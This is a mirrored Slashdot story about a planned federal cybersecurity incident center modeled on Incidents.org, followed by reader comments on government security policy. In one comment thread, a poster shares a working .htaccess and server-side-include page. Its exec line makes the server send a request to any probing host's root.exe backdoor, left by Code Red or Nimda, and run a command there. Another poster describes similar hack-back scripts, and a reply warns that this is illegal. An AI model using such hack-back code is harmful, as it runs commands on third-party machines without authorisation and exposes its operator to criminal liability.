Slashdot Mirror

← Back to Stories (view on slashdot.org)

Federal NOC To Be Modeled After Incidents.org / DS

Posted by timothy on from the why-not-just-send-incidents-some-cash dept.

An anonymous reader writes "Computerworld is covering in more detail the new Federal 'Cybersecurity Center.' The article explains that unlike some earlier rumors indicated, the center will not try to build a super-carnivore, but instead use voluntary reports. It will be similar to the SANS Institute's Internet Storm Center, which summarizes contributions submitted to DShield.org. This system of voluntary contributors has been shown to be effective in the past by issuing early warning for a number of major Internet worms, like Code Red, Ramen and SQLSnake. Unlike Symantec's 'for pay ' Deep Sight service, which publishes alerts only to paying members, Incidents.org is a free service."

30 comments

  1. Nice formatting by glam0006 · · Score: 0

    Why did this anonymous coward choose to put a
    in his submission?

  2. follow-up on CodeRed/Nimda by valmont · · Score: 3, Interesting
    A few months ago i posted a follow-up in my /. journal on code red and nimda queries sent to my apache server thru my residential dsl connection. I gathered a list of *all* unique queries i've received so far.

    I also came-up with a few shell scripts used as CGI to make HTTP requests back to offending hosts, exploiting the very vulnerabilities they're probing me for to, place "WARNING YOU ARE INFECTED" text messages at strategic locations on their hard drives. drop a note on my journal comments if u need more info on that.

    --
    Extraordinary Vacations. Exceptional Prices
    1. Re:follow-up on CodeRed/Nimda by Sobrique · · Score: 2, Informative

      The problem with doing this is that you are committing a criminal offence by doing so. You are effectively, and wilfully commiting a breach of some computer law in your country.
      It's one of those long discussions for a rainy afternoon, but IMHO you need to be careful doing that. After all, code red/nimda is just a worm, but if someone catches you hacking their server, then it'll be you in trouble.
      Some discussion occured on various securityfocus mailing lists regarding this point. (I haven't posted a link, because the load on the security focus website is too high at the moment.)

    2. Re:follow-up on CodeRed/Nimda by Phroggy · · Score: 2

      I made a .htaccess file containing:

      AddType text/html .ida
      AddHandler server-parsed .ida

      Then made a file called default.ida that looks like this (the part between <!-- and --> is all on one big long line):

      <HTML>
      <HEAD>
      <TITLE>Go away.</TITLE>
      </HEAD>
      <BODY>

      This server runs Apache on Linux. It is immune to Microsoft viruses and worms.
      <!--#exec cmd="/usr/bin/lynx -dump http://$REMOTE_ADDR/scripts/root.exe\?/c+net+send+ localhost+%22Your+Web+server+has+been+infected+wit h+a+virus.++I+know+this+because+your+server+tried+ to+infect+my+server.++I+sent+you+this+message+beca use+I+am+a+nice+guy.++Someone+else+may+not+be+so+n ice,+and+this+virus+lets+them+steal+your+data,+era se+your+hard+drive,+or+anything+else+they+want.++P lease+fix+your+server,+or+take+it+offline.%22 >/dev/null 2>/dev/null" -->
      </BODY>
      </HTML>

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    3. Re:follow-up on CodeRed/Nimda by valmont · · Score: 2
      very cool :)

      --
      Extraordinary Vacations. Exceptional Prices
  3. wow big dilema by Christianfreak · · Score: 2

    On one hand its free and should provide useful information to keep our networks and computers secure. On the other hand it's run by the government which of course we all know is bad ... choices choices :)

    (right now some slashbot's head is exploding! :) )

    --
    The Anti-Blog
  4. Good idea by Spazholio · · Score: 0

    Seems like a sort of Bugtraq list for viruses and malicious code. Sounds like a great idea, if it can get off the ground. Let's hope it does.

  5. Now, if only we could report Klez.... by wowbagger · · Score: 3, Interesting

    I just want a way to stop the damn Klez worms I keep getting emailed from pixie.udw.ac.za (a university in South Africa). I've mailed their admin repeatedly, mailed their faculty, even mailed their upstream. The closest thing to a response I've gotten was a response from one of the faculty saying "Yeah, we are getting hammered by that too."

    What we need is a good way to force admins to actually ADMINISTER the systems they are responsible for, and should they refuse, to get the upstream to null-route the machine until it is fixed.

    --
    www.eFax.com are spammers
  6. Protection or detection? by Spazholio · · Score: 1, Insightful

    I'm a little unsure of what this will accomplish. Is it only going to alert you to the newest threats out there, or is it actually going to give info on how to protect your computer from them as well? Hopefully, one would think one would naturally lead to the other, but as someone already said, this IS the government running it. =)

  7. "but instead use voluntary reports" by IGu · · Score: 0, Flamebait

    voluntary reports ...
    this is the same thing as in '80 comunism (i know, i lived there)
    next thing you know is they are going to put us all in flats so they can monitor us better (i hope i don't give any ideas)
    something is rotten in the internet

  8. Duplicating private sector by sjanich · · Score: 4, Insightful

    WOUldn't it make more sense to instead of spending money building something like incidents.org, to fund incidents.org partially with grant money from the feds, so that it can beef up somewhat, and create a Federal liason team? They would spend less and get their goal quicker.

    1. Re:Duplicating private sector by tubabeat · · Score: 3, Interesting

      It would, any fool could see that. So... given that governments usually have a high concentration of fools... we could reasonably assume they already worked that out. Which can only mean that they want to control it. Now why might a government want to supress computer security alerts...?

      --
      "Linux is a serious competitor"
      - Steve Ballmer, Chief Executive Microsoft Corp.
    2. Re:Duplicating private sector by RollingThunder · · Score: 3, Insightful

      Not if you want to start doing DShield-like data correlation, but from the ubersecure (snicker) internal government systems.

      People would have an absolute bird if it got out that attempted access logs from #insert government agency here# were being sent to a NGO for correlation.

      Although I won't deny that some greenbacks for incidents.org would be a great idea.

  9. Good Idea by extagboy · · Score: 2, Insightful

    Seems like a good idea as long as anonymous contributions from the public are welcome and uncensored. If it turns into a government throttled source of information, it won't be any good to anyone.

  10. I'd use it by rczyzewski · · Score: 0

    I'd use it, but I wouldn't necessarily keep it as my only source of information. There are still a lot of other pieces out there that could be overlooked or ignored.

  11. Re:Attention Slashdorks by zapfie · · Score: 1

    Troll, perhaps, but very true.

    --
    slashdot!=valid HTML
  12. Re:Attention Slashdorks by Anonymous Coward · · Score: 0

    I did.

  13. MEEPT!! by Anonymous Coward · · Score: 0

    Ho! Ho! Between the ads for sourceFake and the postings from UA Hardware employees, slapdown looks more like masteurbation every day!

    MEEPT!!

  14. IT purchases must be _certified_ for security? by cfadam · · Score: 3, Insightful

    Did anyone else notice this statement:

    "In an interview with Computerworld last month, Clarke said the plan may include a governmentwide policy that requires all IT purchases to be independently certified for security prior to approval."

    I would like to know what it takes for a product to get "independently certified for security", and how would/does this affect OSS?

    (If this has been posted and answered in the past, please mod me down.)

  15. Re:IT purchases must be _certified_ for security? by Louis_Wu · · Score: 2
    I would like to know what it takes for a product to get "independently certified for security", and how would/does this affect OSS?

    If this has been posted and answered in the past, please mod me down.

    It has been posted, but not sufficiently answered. :)

    The tentative answers which I have seen seem to end up saying that any commercial certification would probably cost too much for OSS/FREE and that any government cert would be biased by established software companies "adding their expertise and experience to the process". (Unless those commercial certs were aimed specifically at OSS/FREE, in which case they would be the victims of discrediting campaigns by the other commercial certs. Which would leave the costly certs as the only "respectable" certs around.) Much weeping and nashing of teeth, but I still haven't seen any good solutions. Maybe I've missed something.

    Side note, we do need companies giving input to government regarding what those corporations are knowledgable about and good at, but that needs to be tempered by honest gov't types who have a clue about the industry. Think USPTO with clueful people running it. EX: I'm not much of a programmer, but if I were reviewing a patent application for a new sort method, I would have a good idea about where to start looking for info.

  16. Why do you care? by alexhmit01 · · Score: 2

    You should want OSS because it respects your rights. You shouldn't care what others use.

    The government (or a company) wants a verified, legit product? Fine. They don't use an OSS OS (like a downloaded copy of Linux), they buy copies of Redhat Linux.

    Why do you care?

    Why is everyone here worried what other people are doing?

    Alex

    1. Re:Why do you care? by cfadam · · Score: 2, Insightful

      I care because I don't want to see open-source security products viewed as a lesser-quality product due to funding issues on the part of its contributors. If the government is going to install something as important as security software, they should have the right to choose the best product period, not just the best commercial product.

      If the cost of certification is too great, that may also stop smaller security companies from being evaluated as well, also due to funding problems.

      We shouldn't trust our nation's security only to those with deep pockets.

      - A

  17. What's the matter by Anonymous Coward · · Score: 1, Funny

    Even trolls hate this story? Damn.. such a boring story...

  18. bloated budgets by ohzero · · Score: 1

    I remember reading the exact same article about the NIPC (mentioned in this article), and how it was supposed to do all the things that this cetner is supposed to do. We have highly paid people running around in very costly facilities who are definately not the most clued people in the industry, because regardless of the dot-com fallout, network security salaries haven't dropped too much (xxx,000). I wonder if maybe next year, we can build another center so that it can collect data from this new center, plus the NIPC and whatever other centers have been built to either collect data on other centers or from actual events. This is a crock of shit.

    --
    -- http://www.criticalassets.com
  19. Gov's first simple steps, NIST will lead on by turtleshadow · · Score: 2, Insightful

    This is NOT news to anyone that has been following CSRC NIST SP-800 publications that have been trickling out of Gaithersburg MD for some time. They are even reaching out to small business

    Establishing a decent list of the telco demarks and physical inventory and assesment of vital devices was the 1st thing and probably done to a good tolerance. This is the next step. Get all the traffic reports going to a central NOC.

    NIST have been writing fairly decent and comprehensive publications that deal with Firewall, email, WAP and assesment of security position. And surprisingly the Public it seems has been regularly asked to comment based what is occuring everyday in business IT.

    Currently with the release of the ASSET evaluation tool Fed agencies and departments no longer have the rug to sweep year's of poor planning and practice under.

    I'd fully expect that in a few years, use of this Federal NOC and its services of cross site and network attack detection ability could be put into a FIPS standard of some sort. Those that deal with GOV will have to deal with GOVs rules.

    If I was a federal law enforcement agency it would be an easy sell.

    Sharing GOV net traffic information parallels the concept of sharing "most wanted" lists, prison rolls, evidence research, cold leads and what not.

    I just wish the US Gov would also do the same for spammers for theft of services!

    Its not a surprise that nearly 100% of all Federal buildings and critical facilites have a small number of meatspace entry points which are screened and watched, why should we expect different for Internet, Extranet and Intranet spaces.

    I foresee the American Internet much like American Banks in the 1930's. We are past the "glory" bandits like Bonny and Clyde stage and are just getting weary of the wanna be criminals.

    It was about that time the FBI was established to chase after cross juristiction criminals. The Bureau with many other institutions like Insurance companies insisted Banks put in physical measures, guards, bars, silent and audible alarms, robbery training for staff, proof of executing government regulations, etc.

    I predict in 8 years Insurance industry will up your premiums for not having a syslog server, Not having a written and practiced fair use policy with employees, not having firewalls between vital resources and untrusted segments of your business. Heaven help come audit time!

    My friends computers are rock, metal, plastic and air -- not majik. Get over it.

    Reading any of the NIST program documents and having any experience with business consolidation helps in what to forecast next.

    My bet is the US Gov to institute internal national EDI networks based on XML exchanges to negotiate terms of service and usage of resources. Quasi-Privatized EDI would preclude any undesireables and non-participant networks.

    My 2c

  20. Oh no, think of the children by Anonymous Coward · · Score: 0

    Am I allowed to make a wild guess?

    when the .gov will spend enough money to get some ids and firewall log collection facility up, they will get excactly as many reports as in the dshield db (which covers the rest of the net), but none from the admins who still have iis serving 3 pages of out of date info, or worse, are running it default install, without pages at all. These are also unlikely to notice this "department of net security", ot yet again worse, they will notice it and think they are secure becouse others are patroling their nets now.

    So now the US goverment will spend all its time tracking down useless port 80 scans and codered attacks, eventhough by now someone there should have got the message that they should send someone around to whack every .gov admin who has a vulnarable site of some sort on the head and give them the choice: read up on the basics of security or get fired and replaced by someone who has had to for example explain during their job interview why ms downplaying the ssl certificate path mistake in internet explorer is a really bad thing. ( "Doing this would likely require that the attacker be able to modify the Internet infrastructure that the user transited, via a technique such as DNS cache poisoning" or abusing wireless networks, how is the microsoft solution for this problem coming along again?)